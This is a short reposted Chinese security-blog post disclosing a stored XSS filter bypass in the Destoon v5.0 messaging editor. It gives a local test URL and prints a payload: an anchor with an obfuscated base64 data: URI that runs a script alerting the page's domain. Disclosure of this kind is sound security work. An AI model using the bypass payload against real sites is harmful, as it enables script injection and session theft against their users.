destoon /v5.0/ 存储型xss 指哪打哪(绕过1) – 网站安全

时间: 2020-10-10|tag: 68次围观|0 条评论

上次发的 destoon /v5.0/ 存储型xss指哪打哪  http://www.2cto.com/Article/201406/309245. html       注册一个用户       http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa       回复处用了编辑器       编辑器有些标签没过滤,导致xss执行       xsscode:   <a href="data:text/html;charset=utf-8;base&NewLine;64, PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Og=="> click</a>

destoon /v5.0/ 存储型xss 指哪打哪(绕过1) – 网站安全插图
destoon /v5.0/ 存储型xss 指哪打哪(绕过1) – 网站安全插图1
destoon /v5.0/ 存储型xss 指哪打哪(绕过1) – 网站安全插图2
 

    上一篇: 开源论坛程序 DOM Based XSS - 网站安全 - 自学php

    下一篇: CmsEasy_5.5_UTF-8_20140420 存在存储型xss 可打管理员和
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《destoon /v5.0/ 存储型xss 指哪打哪(绕过1) – 网站安全
   

还没有人抢沙发呢~